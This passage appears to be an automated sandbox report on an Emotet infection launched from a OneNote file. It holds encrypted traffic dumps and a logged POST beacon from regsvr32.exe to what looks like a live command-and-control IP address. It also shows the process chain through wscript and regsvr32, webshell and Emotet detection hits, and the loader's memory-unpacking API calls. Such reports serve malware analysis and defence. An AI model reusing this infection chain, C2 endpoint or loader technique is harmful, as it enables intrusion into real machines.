                                                                                                Data Ascii: <V4!Q@3bd!f5zn_7D\@g9?AC:|<Y-3B4#va@$gsPnr4{<hTR<i3.%5zcS(64%|5t=#f$=X`EjzS<`j J1IRSh;bk$kv8&'18?4S5t=h0?e`mxw?+/RvIJI5W&kbkk$E(
                                                                                                2023-03-17 08:06:26 UTC208INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:26 UTC208INData Raw: 34 30 30 30 0d 0a e3 a0 f4 22 40 43 35 fd f4 38 3d 59 3c 20 bd 24 2d 1a 34 48 7b eb ee 98 61 64 35 bd d6 66 44 37 44 5d 67 6b 65 b8 8a 6b 70 62 41 34 3b 1c 3a b9 91 19 3d 68 30 23 90 ef 74 49 33 62 66 81 ec 24 34 7a 53 93 a8 c0 f2 d2 9d 2b 64 39 3f ba 8e 95 f7 c8 b0 34 70 78 3c d0 b9 28 31 21 51 0a b9 4d b3 79 94 ff 29 ed b0 7a 52 26 45 7f c9 56 1e af 9a c6 77 a2 35 46 21 84 b0 34 70 78 3c 14 0a 68 30 e0 fc 02 35 48 33 6f e8 b5 21 65 35 7a 36 ad c0 77 45 53 28 e2 e0 79 3e 2b 71 a5 c4 03 34 74 71 0e 94 59 3c e9 bd 61 50 42 34 8f 77 2a 53 c1 c4 24 34 7a 53 29 c4 82 04 52 28 6b 01 b9 44 5d fa e7 01 42 35 74 f8 fd 7c 58 3c 68 78 ac 54 b3 2f 49 33 2a e2 45 31 2c b8 7f 65 31 45 37 0c da 6d 83 2d b4 3a cc 00 62 41 0b bc 31 f9 30 b1 5c 5c 86 cf de 19 cb 70 6c 73
                                                                                                Data Ascii: 4000"@C58=Y< $-4H{ad5fD7D]gkekpbA4;:=h0#tI3bf$4zS+d9?4px<(1!QMy)zR&EVw5F!4px<h05H3o!e5z6wES(y>+q4tqY<aPB4w*S$4zS)R(kD]B5t|X<hxT/I3*E1,e1E7m-:bA10\\pls
                                                                                                2023-03-17 08:06:26 UTC216INData Raw: e8 a8 dc cb 99 23 d2 8d dd 6b 23 fb 17 02 05 19 17 ac d7 ea 11 1d 7f 14 b3 9f be 84 71 50 09 9e aa 59 3c e9 7c 05 29 60 63 73 4e e3 1f 24 19 46 6b 98 a2 a7 31 13 3c 4c 7f b5 e9 b2 7b 0f 09 e9 05 67 75 9c 2f 20 c3 a6 74 e1 35 6e 32 43 34 0c b8 a9 2e 33 a1 2c be ac d8 e9 0d bc 18 77 48 23 ee 4d 1b 43 39 e1 85 13 6a 3c 8e 98 f0 95 74 eb dc 09 96 06 10 40 89 d3 6b 00 a6 20 11 76 31 09 45 37 83 17 0c 7b 11 f5 3f 2b b6 26 65 73 97 0c 71 78 70 d2 fd a9 54 05 61 48 bf 0c 17 52 e6 14 21 a5 d7 78 da 72 61 07 95 37 0c 5b e4 7d 1b 1b 34 a5 41 43 b4 00 55 48 66 06 01 45 bb 65 75 72 bd 0c 17 52 ac 44 45 24 8c 86 33 0b 82 33 60 bc 52 de 7c fe 7b 0f 49 7c 11 de ba b3 35 5c 74 b7 46 4d 36 e6 15 66 04 f3 0c 62 6b 81 25 40 05 5a 03 26 45 b6 00 77 18 27 7e c6 c0 aa 05 46 71
                                                                                                Data Ascii: #k#qPY<|)`csN$Fk1<L{gu/ t5n2C4.3,wH#MC9j<t@k v1E7{?+&esqxpTaHR!xra7[}4ACUHfEeurRDE$33`R|{I|5\tFM6fbk%@Z&Ew'~Fq
                                                                                                2023-03-17 08:06:26 UTC224INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:26 UTC224INData Raw: 34 30 30 30 0d 0a 3d 3c f8 04 18 49 69 20 bd 8d 75 12 c8 b7 cc 2a ea ec d1 60 35 7a 1a ad 9c 7f cf aa c0 1c 4b 39 3f ec 35 46 01 1c 5a 74 71 bf 78 7d 78 10 74 21 51 71 f4 00 ba 26 4f 48 a6 20 11 46 60 3b 45 37 08 de 64 4f 35 f8 53 0f 4d 6c c0 37 11 48 a5 38 38 59 fb 2c 14 15 14 13 34 48 f2 0e 4f 34 63 e5 79 5e 67 68 c3 dc fe 92 4c 4f 51 31 be 67 55 56 bb c5 1b fa f0 0c 18 6d d2 29 8e ce 96 06 10 70 69 b5 6b 00 e0 28 11 42 4a 60 ca f5 c5 27 0c 53 79 ce bf e9 b6 26 65 73 88 59 71 78 57 1d 18 58 61 a8 15 66 04 c9 7f 46 5b b0 b8 67 06 fb 27 02 75 d3 5d fb 25 ea 11 1d 0f d0 5b c7 7f c8 71 50 41 3c b7 1d 18 50 bb 75 75 76 bf 04 17 5e e2 44 45 4c f2 3e 77 06 7d 37 44 53 c0 5a 53 39 3f ec 35 46 75 65 07 74 71 c0 f7 32 14 c7 bb 6d 75 76 78 c5 7e f2 9c e1 4a ae 8d
                                                                                                Data Ascii: 4000=<Ii u*`5zK9?5FZtqx}xt!Qq&OH F`;E7dO5SMl7H88Y,4HO4cy^ghLOQ1gUVm)pik(BJ`'Sy&esYqxWXafF[g'u]%[qPA<Puuv^DEL>w}7DSZS9?5Fuetq2muvx~J
                                                                                                2023-03-17 08:06:26 UTC232INData Raw: 8b bb ec 64 35 f1 1e c6 b2 d6 6f 99 f9 82 66 f3 fe c2 77 eb 0c a3 b4 31 91 4d 6f a6 c3 a9 55 c1 52 29 71 a8 19 eb 2e e0 e0 11 d5 30 d6 38 ba 7e cf 55 60 e2 21 1d 0f a0 34 82 c8 07 11 5c fa 3d d8 1d b7 25 d8 65 da 07 d8 09 b8 34 63 48 ea 29 cd f3 17 02 65 df f8 eb d7 94 a2 7c d7 8f d7 62 41 82 50 9c 7a f3 f4 e3 3d 68 30 21 d0 07 dc da b7 62 6b bf fa 50 35 7a 92 4b ad 27 c5 26 c0 5e 60 39 3f a0 34 8a 7a 8b 3a 30 83 91 ea a7 c3 97 8f e2 1a 42 34 a1 e2 9c 94 ff a6 21 d1 20 0a 26 45 b6 01 b7 6f 42 9a c6 be 6e 95 48 2b bc ca b5 1c 9c 36 d8 49 8c 62 21 6b 42 f3 0d db 83 a4 00 61 e5 70 92 b5 1b 45 37 c5 16 c0 65 80 39 3f aa 04 8a 8e 55 08 5a f0 0d d4 8f d6 55 1e aa 14 aa bf 0d d7 8a 55 59 61 64 f2 3f bf 59 73 37 44 1b a3 b3 2d b4 7a d3 b0 07 ad 53 7d fd 35 5c 04
                                                                                                Data Ascii: d5ofw1MoUR)q.08~U`!4\=%e4cH)e|bAPz=h0!bkP5zK'&^`9?4z:0B4! &EoBnH+6Ib!kBapE7e9?UZUUYad?Ys7D-zS}5\
                                                                                                2023-03-17 08:06:26 UTC240INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:26 UTC240INData Raw: 34 30 30 30 0d 0a fb 2c 14 09 e3 d0 34 48 f4 26 4f 2c ed 84 35 7a 94 62 61 07 6e 93 28 6b 2d bc ff 5e 2e a5 05 67 15 8c f3 78 3c e0 d6 80 b3 8b 10 fb 8d 4a 36 f5 ea 44 45 44 b1 5e ac d9 c4 73 60 73 4b 3c 9a c6 be 67 55 42 b7 a6 7f 49 f0 0c 18 79 9c a6 ca de 96 06 10 6c 1b f1 6b 00 e0 28 11 5e 94 c3 cb 85 c5 27 0c 4f cd 02 b7 99 fa 26 65 67 be 30 55 58 d4 72 c4 96 cf 69 d8 47 b8 4b 32 62 23 8b b6 2c be b1 1b ad 19 13 14 1b ab af 25 66 77 d4 91 ae c8 0f 11 7c 24 30 b7 b5 74 eb dc 41 96 07 c4 b8 3f 62 6b 33 a1 ed 70 8e 94 63 55 9a 6b 53 28 ea 10 29 79 24 3b 98 80 2e 25 7b f0 0d 2c 38 c7 5e 99 aa 14 52 bd 0d df a5 2e 10 7a 81 35 7a d2 63 55 cf 85 ac d7 ea 20 29 ad 56 8e 9d c0 36 25 d9 fc d8 ab d2 79 78 b9 64 b9 85 71 a8 57 47 6b 00 d9 39 74 36 fd ad 08 d7 b3
                                                                                                Data Ascii: 4000,4H&O,5zban(k-^.gx<J6DED^s`sK<gUBIylk(^'O&eg0UXriGK2b#,%fw|$0tA?bk3pcUkS()y$;.%{,8^R.z5zcU )V6%yxdqWGk9t6
                                                                                                2023-03-17 08:06:26 UTC248INData Raw: d8 63 96 bc 11 14 a3 26 aa b0 7b 0f 59 a5 05 67 15 54 71 78 3c b1 c0 be cf de e9 76 77 48 33 8b 7a ff 9e 9b f2 3f 98 43 4a 37 44 eb e3 00 4d 96 b4 66 ba 95 a0 68 ff a5 98 7b f6 98 d5 6d b9 6c 9a 83 59 83 39 a3 06 cb 67 e5 40 b1 86 1f 17 69 c5 26 e3 90 41 63 61 ec 34 a5 2e c0 35 74 1a 3d fb 0a b5 2d f7 99 68 cc d7 70 b8 2f ac f7 80 a5 df 7e da 73 82 f6 29 94 2a ea 10 fe 29 a0 71 62 86 06 fa d4 2c 78 3c 32 79 a7 12 a8 14 8d b5 3d fc 2e 97 04 61 a3 70 3d 57 4f 45 37 2f 16 6f 31 ec 7c 78 aa 34 25 13 a2 35 74 b0 15 7b 54 57 2d 77 3c d8 07 73 c9 46 25 7d 3e 68 64 be 3f 14 62 ce 7a 8b 17 a3 2e a2 b2 72 e0 f8 26 65 6b 7d fd 2d 5c 1c b1 de df 30 21 e9 e1 21 48 33 8b 38 fe 9e 9b 7d f1 16 c9 0d be 01 5c ef 2e 22 28 cf 2b 71 e3 04 04 b4 38 71 78 bd 1c 7b 06 78 de ae
                                                                                                Data Ascii: c&{YgTqx<vwH3z?CJ7DMfh{mlY9g@i&Aca4.5t=-hp/~s)*)qb,x<2y=.ap=WOE7/o1|x4%5t{TW-w<sF%}>hd?bz.r&ek}-\0!!H38}\."(+q8qx{x
                                                                                                2023-03-17 08:06:26 UTC256INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:26 UTC256INData Raw: 34 30 30 30 0d 0a 8c 9a 33 62 aa a5 41 62 35 7a 5f a7 c0 17 42 53 28 dd e6 c6 c0 aa fc 42 47 43 35 a1 c1 76 82 d8 89 48 36 21 51 46 38 6e 8c a5 ee 18 67 64 35 aa 56 26 45 bc c1 4b 2e 6b 65 b4 33 eb 72 ab c8 ce 2d 72 71 78 74 d4 71 fc b1 a4 49 44 34 48 96 81 94 ff a0 c1 2d 7c 53 26 43 b6 f1 4b 2e 6b 65 8f c5 32 71 a5 c4 53 33 74 71 c7 f9 59 3c e9 b5 31 57 42 34 77 b0 9d 94 81 e4 74 33 7a 53 cc b6 c8 bb d2 ad 7b 63 39 3f 49 ec 9d be 82 98 64 77 78 3c 5f bd dd 20 27 51 42 aa b0 ce 61 e0 85 71 62 35 7a da 62 61 77 0c d8 6d f3 2d b0 7b 0f 49 e9 c4 5b 33 74 71 f1 78 7d 0c e3 b5 01 57 42 34 c1 77 46 43 8b e4 4c 33 7a 53 af 01 13 64 bb 62 0d 9b c6 ba eb 7e e7 01 42 35 74 b6 3d bc 62 4f 68 30 99 2c 4e fa 8f b2 2f eb 71 94 14 cf f1 1e a6 b2 d6 fc 56 69 7b 61 f8 d5
                                                                                                Data Ascii: 40003bAb5z_BS(BGC5vH6!QF8ngd5V&EK.ke3r-rqxtqID4H-|S&CK.ke2qS3tqY<1WB4wt3zS{c9?Idwx<_ 'QBaqb5zbawm-{I[3tqx}WB4wFCL3zSdb~B5t=bOh0,N/qVi{a
                                                                                                2023-03-17 08:06:26 UTC264INData Raw: 6d 1c ee 6c 90 a0 3c 1d c8 07 11 54 99 49 4b a7 c3 af 75 56 dc a8 34 48 b2 27 1c fe ce 9b ca 11 16 51 23 be 01 24 43 2e 12 48 b6 6e 06 e9 04 34 b8 78 31 c0 9d f9 9c c8 f1 c0 55 cb 79 3f b2 17 1c d2 41 c6 2d bd 16 89 53 0d 44 53 a3 26 ca ce de ea 9b 67 c8 16 9a f5 04 d7 ca 7b 37 68 f7 64 f6 99 57 48 33 e3 2e a7 09 df 35 7a d2 53 e2 da b1 59 28 ac 20 46 58 42 71 62 c0 06 4a cc bc 78 3c 15 b7 a7 b1 54 2e bc 3d 49 33 e9 2e 7f 25 ef 70 dd d8 73 ea de 19 a8 d7 94 a2 7c 48 5b 78 62 41 82 50 03 7f 13 79 2e 37 e1 75 56 3a 07 43 20 ba 27 1c 81 14 13 a5 99 7d ad ce 72 33 bb 50 40 9a c6 f8 6e 06 90 bd 43 35 f5 34 0f a4 f5 c3 97 78 aa 89 c3 41 3f f2 8f 29 4d ea 21 42 f3 16 c9 82 72 33 d1 f6 6b 65 f8 52 5c 75 e3 34 34 dc 79 71 78 b7 1c 4b e1 75 d2 96 07 43 df b7 62 6b
                                                                                                Data Ascii: ml<TIKuV4H'Q#$C.Hn4x1Uy?A-SDS&g{7hdWH3.5zSY( FXBqbJx<T.=I3.%ps|H[xbAPy.7uV:C '}r3P@nC54xA?)M!Br3keR\u44yqxKuCbk
                                                                                                2023-03-17 08:06:26 UTC272INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:26 UTC272INData Raw: 34 30 30 30 0d 0a 61 2c bc 32 63 6e c0 fe 4b d6 07 69 65 39 87 e8 39 62 41 aa db 89 8e 87 fb 1c 24 01 f6 21 51 83 51 50 38 e3 2e 18 a6 3e ca 85 d2 6b 5d 8c fe dd aa ea 10 21 77 e7 cc e4 86 06 15 e2 c6 78 3c d8 79 48 48 f3 ae bd 8e 08 33 62 6b c1 0c 44 36 fb 26 06 34 53 4d 53 a3 2e 45 b2 7a 33 99 11 32 bc ca 3c f8 7d 7c 26 3c 68 78 a4 91 4d b0 99 32 62 6b b8 3a af 35 7a ba ad b8 c8 bb 94 6d 4b 75 60 3f 2b c9 e7 51 01 3d ff 3c 58 cb b8 84 ed 20 63 59 69 fe 99 da 61 a1 c1 88 61 bc 37 73 e7 28 17 4c d2 65 4b 85 49 49 db f0 17 61 f8 33 00 81 bf 79 41 0f f1 30 21 d0 07 2c 2d 3d 62 6b c1 0c 7c 31 f1 1e 3e b2 d6 6f 99 f9 82 66 f3 fe c2 75 eb 0c 5b f4 19 69 7e bd 2c 24 89 e2 22 51 85 71 60 48 20 6b 00 a0 01 1d 74 d2 63 6d a2 9b 53 28 ea 10 11 46 88 e7 72 86 06 05
                                                                                                Data Ascii: 4000a,2cnKie99bA$!QQP8.>k]!wx<yHH3bkD6&4SMS.Ez32<}|&<hxM2bk:5zmKu`?+Q=<X cYiaa7s(LeKIIa3yA0!,-=bk|1>ofu[i~,$"Qq`H ktcmS(Fr
                                                                                                2023-03-17 08:06:26 UTC280INData Raw: 8e 2a c8 46 c3 10 71 78 78 d2 f3 2c bb e7 19 c9 e7 00 b8 af 27 8d 3d 40 55 33 d8 7d 55 7e cf 38 30 22 ee 4a 1f 62 fa 81 1e 0b ca 94 bd b4 70 d2 e0 21 b9 7a 59 0b bd 23 2b 2b e2 73 41 33 7d f9 bf 76 ce b3 60 f3 28 6b 65 71 b4 97 55 ca 41 43 35 3c fa e4 18 c9 3c 68 30 68 d8 39 c4 c1 77 46 2b 8b e5 40 ad 7a 53 26 cc 73 60 6b a3 ef 41 b1 3f 2b 71 2b c8 18 ed fd 35 5c 14 d2 b8 4c b0 21 51 42 8e 4c 32 62 6b 49 ea 8d 7c f1 a3 af 01 13 64 bb 20 25 9a c6 85 45 e6 9b b2 84 71 50 19 a7 c6 59 3c 80 b2 47 af bd 78 c3 fc 2e e0 c5 db 60 34 7a 53 6e ce fc 0c da 9c 4f e5 39 3f 2b 39 e9 1d 67 55 3c fa 14 18 29 74 e3 44 05 29 0a b7 8c 63 3d 23 ff 81 a8 79 f1 8f 6f cc 6c 4c 1a a1 00 75 70 b6 58 69 2b c8 38 15 35 27 30 bf b5 4c e3 b4 05 b1 42 34 48 7b e9 c7 24 89 64 35 7a 17
                                                                                                Data Ascii: *Fqxx,'=@U3}U~80"Jbp!zY#++sA3}v`(keqUAC5<<h0h9wF+@zS&s`kA?+q+5\L!QBL2bkI|d %EqPY<Gx.`4zSnO9?+9gU<)tD)c=#yolLupXi+85'0LB4H{$d5z
                                                                                                2023-03-17 08:06:26 UTC288INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:26 UTC288INData Raw: 34 30 30 30 0d 0a a9 be 01 a7 ef 2e 75 f6 7b 2b 71 e3 34 53 1a 03 a8 63 84 da 82 c8 1f aa 04 52 c3 aa f2 88 68 89 34 74 b4 0f 43 42 87 03 e1 d2 5d 7b fc b9 a7 8e fa 27 51 ca 70 64 b6 3d 1c ff 7d 45 2d e6 14 a2 d5 20 72 59 ac 45 79 b7 6d 99 b5 e1 00 1f a5 3b 82 f9 a2 7c 2f 91 b2 62 41 82 50 64 61 f3 79 49 fd 88 37 a8 14 52 b5 3d 23 3f e2 09 bc ef 70 6a da 63 55 bc 09 4b a3 2e 45 0a f7 6a f8 6a 86 06 25 69 40 78 3c d8 79 78 7e dc 51 42 b5 0d 23 80 35 00 61 0f 70 6a 3e af 00 27 c5 1e 38 89 5b 20 77 aa 04 72 f7 f5 85 3c fa 3d 2c d0 79 78 bb 6c 79 c9 71 a8 00 aa 2a 89 29 60 f2 3f 43 34 73 37 44 92 4d 7b 63 b2 7a 3b fc 6e 81 40 fc fd 3c 68 bd 1c 2c bb 1a de ae c3 71 58 60 7c 94 ff e0 11 25 01 40 de 45 bc 01 43 a1 2e 75 71 bc ef 51 3f 82 8f f9 b8 39 fb d0 71 fb
                                                                                                Data Ascii: 4000.u{+q4ScRh4tCB]{'Qpd=}E- rYEym;|/bAPdayI7R=#?pjcUK.Ejj%i@x<yx~QB#5apj>'8[ wr<=,yxlyq*)`?C4s7DM{cz;n@<h,qX`|%@EC.uqQ?9q
                                                                                                2023-03-17 08:06:26 UTC296INData Raw: fe 8f dd 11 b1 2d a7 68 da 8d f5 a2 35 2a e2 44 45 4c bc 2f dc 6e c8 62 eb d2 5d e4 b7 ae 3d 2b fa 27 ce 07 be 38 55 28 78 d2 79 ef b9 65 75 62 dc 29 4c 9c 94 f7 b9 7f f5 5f e7 e4 45 37 41 3c 08 6b 65 d0 d5 d1 8e 9d 86 07 11 24 c2 a1 3c 59 bd 2c 14 71 ca 15 cb b7 b2 2e 4f 50 db 07 a0 68 d2 62 61 67 fd 1e d7 94 0e 7d 1b 7b 52 eb 05 67 65 f5 05 5c 6c a5 d0 38 ba e6 14 c5 08 8c 33 62 00 45 e6 52 bc 3f d4 9e 7c b6 57 6b a9 26 e2 25 21 eb 76 e3 34 c4 dc 82 9b 7f fb 1c b3 6a 61 21 51 c3 79 c7 e5 26 28 7b e0 11 ba fe 2c 61 3e f0 01 d0 91 f1 65 39 b4 66 f2 95 a0 fb 8a 22 be 76 17 93 ed 81 33 eb 90 ab 32 c1 7e e1 ba 6d e2 ef 78 f9 a4 c7 6e fd 95 ba 2b a1 a4 d0 39 a2 3c e1 08 c8 fa f5 04 fb 1c e5 35 68 bb 64 d2 cb 70 6c 73 2a e6 45 96 2c bc 3e 77 1e ce 72 cb da 6c
                                                                                                Data Ascii: -h5*DEL/nb]=+'8U(xyeub)L_E7A<ke$<Y,q.OPhbag}{Rge\l83bER?|Wk&%!v4ja!Qy&({,a>e9f"v32~mxn+9<5hdpls*E,>wrl
                                                                                                2023-03-17 08:06:26 UTC304INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:26 UTC304INData Raw: 31 36 30 30 0d 0a 39 9a 3d 2b 65 8d 41 43 56 87 71 78 48 fa 3e 68 e8 d2 51 42 7c bd 33 62 eb a3 63 64 7d 8f 53 26 19 c1 44 53 78 cb 67 39 63 dd 71 62 3a b4 35 74 6d d8 3e 59 40 9f 30 21 92 ba 34 48 af c1 69 00 a5 9c 35 7a 54 d9 45 37 f4 f0 2a 6b 6d c6 3f 2b c4 9d 41 43 49 d6 73 78 84 a6 3c 68 d1 21 50 42 28 e8 31 62 8f 00 60 64 3c 78 52 26 89 94 46 53 24 69 64 39 9a 2e 70 62 99 e0 37 74 d9 7d 3d 59 28 6e 31 21 bd e1 36 48 27 64 6a 00 c1 63 34 7a af 85 47 37 e4 54 29 6b 27 31 3e 2b 5d c2 43 43 71 7c 70 78 f5 51 3d 68 28 85 53 42 f8 40 32 62 04 0a 60 64 15 de 51 26 35 3d 45 53 a3 60 64 39 6f 8b 73 62 cd 48 34 74 28 75 3d 59 10 cc 32 21 0d 4f 35 48 1a 6c 6a 00 e9 c5 37 7a 7f 28 44 37 1e 5c 29 6b 79 99 3d 2b 2d 6d 40 43 1b 64 70 78 10 f9 3e 68 00 31 50 42 f2
                                                                                                Data Ascii: 16009=+eACVqxH>hQB|3bcd}S&DSxg9cqb:5tm>Y@0!4Hi5zTE7*km?+ACIsx<h!PB(1b`d<xR&FS$id9.pb7t}=Y(n1!6H'djc4zG7T)k'1>+]CCq|pxQ=h(SB@2b`dQ&5=ES`d9osbH4t(u=Y2!O5Hlj7z(D7\)ky=+-m@Cdpx>h1PB


Session ID: 1
Source IP: 192.168.2.4
Source Port: 49689
Destination IP: 182.162.143.56
Destination Port: 443
Process: C:\Windows\System32\regsvr32.exe

Timestamp | kBytes transferred | Direction | Data
2023-03-17 08:07:23 UTC | 310 | OUT | POST /ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: 182.162.143.56
2023-03-17 08:07:25 UTC | 310 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 Mar 2023 08:06:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2023-03-17 08:07:25 UTC | 310 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                Target ID:0
                                                                                                Start time:09:05:56
                                                                                                Start date:17/03/2023
                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\OMICS.one"
                                                                                                Imagebase:0xeb0000
                                                                                                File size:1676072 bytes
                                                                                                MD5 hash:8D7E99CB358318E1F38803C9E6B67867
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                Target ID:1
                                                                                                Start time:09:06:22
                                                                                                Start date:17/03/2023
                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                                                                                                Imagebase:0x1360000
                                                                                                File size:147456 bytes
                                                                                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000002.404361294.0000000005166000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.389837714.0000000005222000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.399230636.0000000005194000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.401747344.0000000005166000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.401867106.0000000005166000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                Reputation:high

                                                                                                Target ID:2
                                                                                                Start time:09:06:26
                                                                                                Start date:17/03/2023
                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                Wow64 process (32bit):true
Commandline:"C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll"
                                                                                                Imagebase:0x1260000
                                                                                                File size:20992 bytes
                                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:3
                                                                                                Start time:09:06:26
                                                                                                Start date:17/03/2023
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline: "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll"
                                                                                                Imagebase:0x7ff787110000
                                                                                                File size:24064 bytes
                                                                                                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.385011052.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high

                                                                                                Target ID:4
                                                                                                Start time:09:06:29
                                                                                                Start date:17/03/2023
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VZzVLyswcgycmo\hwmNzoGEns.dll"
                                                                                                Imagebase:0x7ff787110000
                                                                                                File size:24064 bytes
                                                                                                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.632533152.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.632618428.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:8.4%
                                                                                                  Dynamic/Decrypted Code Coverage:8.9%
                                                                                                  Signature Coverage:7.1%
                                                                                                  Total number of Nodes:282
                                                                                                  Total number of Limit Nodes:8
execution_graph (rendered graph omitted; the node and edge listing is condensed to its API-call nodes)
• Image at 0x180000000 (PE-backed, per the memory dump source further down): CRT startup and locale code (__scrt_release_startup_lock, GetModuleFileNameW, GetLastError/SetLastError, HeapFree, RtlAllocateHeap, HeapAlloc, FlsGetValue/FlsSetValue, EnterCriticalSection, GetACP, GetOEMCP, IsValidCodePage, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, IsProcessorFeaturePresent, GetCurrentProcess/TerminateProcess) and a stock Win32 window skeleton (LoadStringW, LoadCursorW, RegisterClassExW, CreateWindowExW, ShowWindow, UpdateWindow, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, ExitProcess).
• Region at 0x9e0000 (not PE-backed): GetNativeSystemInfo (0x9e033f), VirtualAlloc (0x9e0377 and 0x9e0395), VirtualProtect (0x9e084b), RtlAddFunctionTable (0x9e08c6).
• Nodes in the 0xe04214-0xe1eab4 range: CreateProcessW (0xe13acc), Process32FirstW (0xe08d6f).

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
control_flow_graph for 0x9e0000-0x9e091a (rendered graph omitted; block listing condensed)
• Entry block 0x9e0000-0x9e029a calls 0x9e091c twice. The chain of check blocks that follows (0x9e02a0 through 0x9e0302) each has an edge to block 0x9e0905, which falls through to the function exit at 0x9e0907-0x9e091a.
• API-calling blocks on the remaining path: 0x9e033f GetNativeSystemInfo, 0x9e0377 and 0x9e0395 VirtualAlloc, 0x9e084b VirtualProtect, 0x9e08c6 RtlAddFunctionTable; the final block 0x9e08eb-0x9e0903 also exits through 0x9e0907.
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.384877648.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_9e0000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                  • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                  • API String ID: 394283112-3605381585
                                                                                                  • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
